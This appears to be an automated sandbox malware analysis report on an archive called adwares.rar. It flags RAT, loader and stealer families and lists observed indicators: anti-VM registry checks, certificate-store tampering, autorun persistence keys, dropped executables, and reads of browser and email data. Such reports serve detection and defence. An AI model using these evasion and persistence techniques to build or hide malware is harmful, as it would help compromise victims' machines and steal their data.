Malware Analysis Report

2024-10-16 05:10

Sample ID 231123-heqf3ahb4w
Target adwares.rar
SHA256 f0a17dac24869601564ba23ed962f33e507d79ca4e6a0a31ff54cdb7644b1cc9
Tags
ammyyadmin flawedammyy privateloader risepro collection discovery evasion loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f0a17dac24869601564ba23ed962f33e507d79ca4e6a0a31ff54cdb7644b1cc9

Threat Level: Known bad

The file adwares.rar was found to be: Known bad.

Malicious Activity Summary

ammyyadmin flawedammyy privateloader risepro collection discovery evasion loader persistence rat spyware stealer trojan

Ammyyadmin family

AmmyyAdmin payload

RisePro

FlawedAmmyy RAT

Ammyy Admin

PrivateLoader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Modifies Installed Components in the registry

Downloads MZ/PE file

Manipulates Digital Signatures

Stops running service(s)

Unexpected DNS network traffic destination

Checks computer location settings

Registers COM server for autorun

Reads user/profile data of web browsers

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of local email clients

Executes dropped EXE

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Checks installed software on the system

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Modifies data under HKEY_USERS

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies system certificate store

Uses Volume Shadow Copy service COM API

Uses Task Scheduler COM API

Creates scheduled task(s)

Checks SCSI registry key(s)

Enumerates system info in registry

Modifies registry class

outlook_office_path

outlook_win_path

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Modifies Internet Explorer settings

NTFS ADS

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-23 06:39

Signatures

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-23 06:39

Reported

2023-11-23 07:22

Platform

win10v2004-20231025-en

Max time kernel

2553s

Max time network

2559s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\adwares.rar

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

PrivateLoader

loader privateloader

RisePro

stealer risepro

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A

Downloads MZ/PE file

Manipulates Digital Signatures

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E\Blob = 0300000001000000140000004d56e7ac803733aeb63f6b8217f4be35dfe6c42e20000000010000007c0500003082057830820460a0030201020210019549f3e9c1fd841c29b1f2c2bdd013300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b446967694365727420455620436f6465205369676e696e67204341301e170d3138303230313030303030305a170d3139303132343132303030305a3081ab31133011060b2b0601040182373c02010313025647311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e3110300e0603550405130731383137383033310b30090603550406130256473112301006035504071309526f616420546f776e3120301e060355040a131749726f6e20456e7465727461696e6d656e7420496e632e3120301e0603550403131749726f6e20456e7465727461696e6d656e7420496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a69529c8ded2a23c241b5d3223350310da8bc4c1e27e4f38de191a07c5c3e54105693aa3ecda48b1a6be745a22f6d2617e99ee326e2ee0aff2d2fb01d02a3c2aa03b0a9048d0ada52e6bce2dff81d755729ac88e1818c2665fd9007e9036b0b44a29cbfe4717c0fbbf4370768fe22f37c8be5367db93801592886db3031f7e6a67a36187480957700863fd585152c1b47c4ee0a425533fb659f96b3c826e2a3b43d83e182d06d1eaded7f282b4b375b66ec18ad6e2c2612075644ae549112d938f62647c8904720c810976bf982fb27d0b32674f36945d4515f357616429bfba6975b141c22b59ab705d063aecd315a67fd29ddef8ee550acee03e4ab3b256ff0203010001a38201db308201d7301f0603551d23041830168014ad690670fc801b16b3a918946b9402865ef7278c301d0603551d0e04160414ecafaebf1f8d1389e1c8a95226a9938391dcf69130250603551d11041e301ca01a06082b06010505070803a00e300c0c0a56472d31383137383033300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e672d67312e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e672d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307906082b06010505070101046d306b302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304306082b060105050730028637687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010505000382010100a8590e5af448e75c68937d3c422d3edf1fe3e34f7cb11190a01bfd96c8c1b9c35a473e310ea84296fba0025a747f6247a3d87f2fdbf4a605897c4664567428eb2587b24cbcbb98e73f297bb94470e9d9332d490c5991be31835da48d9d0ff75d15107a81e1779acfc716f41d502c75527e0f2014e8af38de3f051fe2dc0e0dc0582d0f85c87d489e5608fa62044ea83503931b7016675d90f1f56e161d2ec066cd3147239c120eea6b1386f254a4d83d83f4d907652a1e9b3d36d88d21b9af7e5db8bf412e333b503d23b23144b0b0c219435182674e9d503984f820d374707031daed98ed8c44b9d540ab8cd94cab9991d72c5e6518db258236dc44eacb5305 C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2\Blob = 030000000100000014000000e74b8bc01bc843c34d710e29de0411564badc2f22000000001000000900500003082058c30820474a00302010202100d7b87bf9200d82906f619b5ee6c603f300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3137303731343030303030305a170d3138303731383132303030305a3081ab31133011060b2b0601040182373c02010313025647311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e3110300e0603550405130731383137383033310b30090603550406130256473112301006035504071309526f616420546f776e3120301e060355040a131749726f6e20456e7465727461696e6d656e7420496e632e3120301e0603550403131749726f6e20456e7465727461696e6d656e7420496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100adccd719ce3b4f84d425e2b3dbbf3273f8367a02e55980fb8b12d0ec202c5bbc0d40ed46059f647e65139a82317acf7f6c441043d6143f8e23097502d3c6ea25255b91fd27949261f4eac63539b1435624791be516dbf3e5d5803fd396a07c238e7c3a7e7be480b8f1e36a08d4fb7ff1ef640c7a6f00904dd3fb5f96ef5f4e7e47baeeed47bdf254fee13bf4a4e72ce5eb7451ae0cf675ad9d19dfed29621f3cc64b3bcdd7dca22b601c39ea6039603128748b1ab4acd40d3d4f53a41a862687424a55e2a56ede2909a81b695cdc2f6e16dc54864eab896765a75d10c0d156156029c91ac22daa455c8d1b853d4a330fce0de6c83b9ad632646509889134d6930203010001a38201e8308201e4301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149709754f51dc8fa3bf2e4540e443dc015d8816ca30250603551d11041e301ca01a06082b06010505070803a00e300c0c0a56472d31383137383033300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101002f9a80a913a1d71b909c639c165ca1603d5ce7fdac7b50a4eb5d18d334d2f9d35cda3aea2e9239994a6910e122d312ad9211aebc525b54d6b480bdc1c969ff237aae64718cc06ddc194bfd735794d9d889019c1903ef81fbb1eb993aae57ef2dd9665b8a4e8265e15da21281a6526dee2c183e84c696f40a9072df9bfe5c878f3fbbc6826c780a136b05d4f97aa21c671e0a0b58f36be031a532979fbb57879b7772c50cb394ce0ea1e6688936168621ce55f9c83a7589a501d67cdd75616748aa6524f0c0867971b56b73f1e5beb3f6e4341dc6d7f4acac6f0438317b0e6d3c35116f7d9c3a2d401ff79579d791621a3500525bf068199d2ecb0c77040a9d28 C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2\Blob = 030000000100000014000000e74b8bc01bc843c34d710e29de0411564badc2f22000000001000000900500003082058c30820474a00302010202100d7b87bf9200d82906f619b5ee6c603f300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3137303731343030303030305a170d3138303731383132303030305a3081ab31133011060b2b0601040182373c02010313025647311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e3110300e0603550405130731383137383033310b30090603550406130256473112301006035504071309526f616420546f776e3120301e060355040a131749726f6e20456e7465727461696e6d656e7420496e632e3120301e0603550403131749726f6e20456e7465727461696e6d656e7420496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100adccd719ce3b4f84d425e2b3dbbf3273f8367a02e55980fb8b12d0ec202c5bbc0d40ed46059f647e65139a82317acf7f6c441043d6143f8e23097502d3c6ea25255b91fd27949261f4eac63539b1435624791be516dbf3e5d5803fd396a07c238e7c3a7e7be480b8f1e36a08d4fb7ff1ef640c7a6f00904dd3fb5f96ef5f4e7e47baeeed47bdf254fee13bf4a4e72ce5eb7451ae0cf675ad9d19dfed29621f3cc64b3bcdd7dca22b601c39ea6039603128748b1ab4acd40d3d4f53a41a862687424a55e2a56ede2909a81b695cdc2f6e16dc54864eab896765a75d10c0d156156029c91ac22daa455c8d1b853d4a330fce0de6c83b9ad632646509889134d6930203010001a38201e8308201e4301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149709754f51dc8fa3bf2e4540e443dc015d8816ca30250603551d11041e301ca01a06082b06010505070803a00e300c0c0a56472d31383137383033300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101002f9a80a913a1d71b909c639c165ca1603d5ce7fdac7b50a4eb5d18d334d2f9d35cda3aea2e9239994a6910e122d312ad9211aebc525b54d6b480bdc1c969ff237aae64718cc06ddc194bfd735794d9d889019c1903ef81fbb1eb993aae57ef2dd9665b8a4e8265e15da21281a6526dee2c183e84c696f40a9072df9bfe5c878f3fbbc6826c780a136b05d4f97aa21c671e0a0b58f36be031a532979fbb57879b7772c50cb394ce0ea1e6688936168621ce55f9c83a7589a501d67cdd75616748aa6524f0c0867971b56b73f1e5beb3f6e4341dc6d7f4acac6f0438317b0e6d3c35116f7d9c3a2d401ff79579d791621a3500525bf068199d2ecb0c77040a9d28 C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E\Blob = 0300000001000000140000004d56e7ac803733aeb63f6b8217f4be35dfe6c42e20000000010000007c0500003082057830820460a0030201020210019549f3e9c1fd841c29b1f2c2bdd013300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b446967694365727420455620436f6465205369676e696e67204341301e170d3138303230313030303030305a170d3139303132343132303030305a3081ab31133011060b2b0601040182373c02010313025647311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e3110300e0603550405130731383137383033310b30090603550406130256473112301006035504071309526f616420546f776e3120301e060355040a131749726f6e20456e7465727461696e6d656e7420496e632e3120301e0603550403131749726f6e20456e7465727461696e6d656e7420496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a69529c8ded2a23c241b5d3223350310da8bc4c1e27e4f38de191a07c5c3e54105693aa3ecda48b1a6be745a22f6d2617e99ee326e2ee0aff2d2fb01d02a3c2aa03b0a9048d0ada52e6bce2dff81d755729ac88e1818c2665fd9007e9036b0b44a29cbfe4717c0fbbf4370768fe22f37c8be5367db93801592886db3031f7e6a67a36187480957700863fd585152c1b47c4ee0a425533fb659f96b3c826e2a3b43d83e182d06d1eaded7f282b4b375b66ec18ad6e2c2612075644ae549112d938f62647c8904720c810976bf982fb27d0b32674f36945d4515f357616429bfba6975b141c22b59ab705d063aecd315a67fd29ddef8ee550acee03e4ab3b256ff0203010001a38201db308201d7301f0603551d23041830168014ad690670fc801b16b3a918946b9402865ef7278c301d0603551d0e04160414ecafaebf1f8d1389e1c8a95226a9938391dcf69130250603551d11041e301ca01a06082b06010505070803a00e300c0c0a56472d31383137383033300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e672d67312e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e672d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307906082b06010505070101046d306b302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304306082b060105050730028637687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010505000382010100a8590e5af448e75c68937d3c422d3edf1fe3e34f7cb11190a01bfd96c8c1b9c35a473e310ea84296fba0025a747f6247a3d87f2fdbf4a605897c4664567428eb2587b24cbcbb98e73f297bb94470e9d9332d490c5991be31835da48d9d0ff75d15107a81e1779acfc716f41d502c75527e0f2014e8af38de3f051fe2dc0e0dc0582d0f85c87d489e5608fa62044ea83503931b7016675d90f1f56e161d2ec066cd3147239c120eea6b1386f254a4d83d83f4d907652a1e9b3d36d88d21b9af7e5db8bf412e333b503d23b23144b0b0c219435182674e9d503984f820d374707031daed98ed8c44b9d540ab8cd94cab9991d72c5e6518db258236dc44eacb5305 C:\Windows\system32\rundll32.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,1081,19041,0" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*" C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\ie4uinit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,1081,19041,0" C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\servicing\TrustedInstaller.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OperaConnect2.lnk C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\BBWC\7za.exe N/A
N/A N/A C:\Windows\sysWOW64\wbem\wmiprvse.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Browser Extension\7za.exe N/A
N/A N/A C:\Windows\Installer\MSI731B.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\MobiHelper.exe N/A
N/A N/A C:\Program Files\MobiGame\utils\subinacl.exe N/A
N/A N/A C:\Program Files\MobiGame\MobiGameUpdater.exe N/A
N/A N/A C:\Program Files\MobiGame\aeg_launcher.exe N/A
N/A N/A C:\Program Files\MobiGame\utils\subinacl.exe N/A
N/A N/A C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
N/A N/A C:\Program Files\MobiGame\player\SUPInstall.exe N/A
N/A N/A C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
N/A N/A C:\Program Files\MobiGame\player\NetLwfUninstall.exe N/A
N/A N/A C:\Program Files\MobiGame\player\USBUninstall.exe N/A
N/A N/A C:\Program Files\MobiGame\player\SUPUninstall.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
N/A N/A C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-05\0a999f8f8064171ed32e808754c84570cdd517355a0086a8ec988c2619ea6727.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\8af2c945b04889ffc1c53ab93223bd6ef3a0d6cae3ddb8afb4ddd36599864dc8.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\9062ef0482856caa22fe235648bdd7eb8233d6b3d7482dfe7bf32c8473eaf6a3.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\e804947286d19d565add00988db1b2380207b4b1d8781ced6cc2956b65fcbe13.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32\ThreadingModel = "Free" C:\Windows\system32\regsvr32.exe N/A
